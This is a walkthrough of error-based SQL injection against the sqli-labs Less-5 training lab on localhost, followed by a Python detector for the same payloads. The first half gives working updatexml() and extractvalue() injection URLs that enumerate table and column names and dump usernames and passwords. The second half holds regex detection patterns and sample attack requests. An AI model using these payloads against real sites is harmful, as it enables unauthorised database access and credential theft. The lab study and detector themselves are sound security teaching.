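Error-based injection steps:
- Determine the closing character
- Dump the database name
- Dump the table names
- Dump the column names
- Dump the field values
A UNION query is the simplest and most effective method. When UNION queries are not available and injecting a character produces a syntax error, error-based injection can be tried:
- Find the injectable field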
http://localhost/sqli-labs/Less-5/?id=1
- Analyze the injection method
http://localhost/sqli-labs/Less-5/?id=1'
http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select table_name from information_schema.tables where table_schema='security')),1)--+
When the page has no display position for query output, UNION queries cannot be used:
http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+
http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1)--+
http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select group_concat(username,":",password) from users)),1)--+
http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select username from users limit 0,1)),1)--+
http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select username from users limit 1,1)),1)--+
http://localhost/sqli-labs/Less-5/?id=1' and updatexml(1,concat(1,(select username from users limit 2,1)),1)--+
http://localhost/sqli-labs/Less-5/?id=1' and extractvalue(1,concat(1,(select username from users limit 2,1)))--+
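From the defender's side, the requests above share a recognizable shape: `updatexml` or `extractvalue` called with a nested `select`, often against `information_schema`. The following detector is an added example, not part of the original page; the function name `inspect_url`, the finding labels and the sample list are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# MySQL XML functions whose XPath-error message echoes the argument back.
XML_FUNC = re.compile(r"\b(?:updatexml|extractvalue)\s*\(", re.I)
# A nested SELECT supplies the data that ends up in the error text.
SUBQUERY = re.compile(r"\(\s*select\b", re.I)
# Metadata tables used to list tables and columns.
SCHEMA = re.compile(r"\binformation_schema\s*\.\s*\w+", re.I)


def inspect_url(url):
    """Return a sorted list of findings for one request URL."""
    findings = set()
    # parse_qsl percent-decodes and turns '+' into a space, so encoded
    # requests are matched the same way as the readable ones.
    for _name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if XML_FUNC.search(value):
            findings.add("xml-error-function")
            if SUBQUERY.search(value):
                findings.add("subquery-in-xpath")
        if SCHEMA.search(value):
            findings.add("schema-enumeration")
    return sorted(findings)


BASE = "http://localhost/sqli-labs/Less-5/?id="
# Constructed sample requests: two copied from the page, one percent-encoded
# variant, and two benign requests that must not be flagged.
SAMPLES = [
    BASE + "1",
    BASE + "1' and updatexml(1,concat(1,(select group_concat(table_name) "
           "from information_schema.tables where table_schema='security')),1)--+",
    BASE + "1' and extractvalue(1,concat(1,(select username from users limit 2,1)))--+",
    BASE + "1%27%20and%20UpdateXML(1,concat(1,(select%20username%20from%20users"
           "%20limit%200,1)),1)--+",
    "http://localhost/search?q=how+to+use+updatexml+in+mysql",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(inspect_url(url) or ["clean"], url[:70])
```

Detection of this kind complements the actual fix, which is to bind `id` as a query parameter and to return a generic error page instead of the database error text.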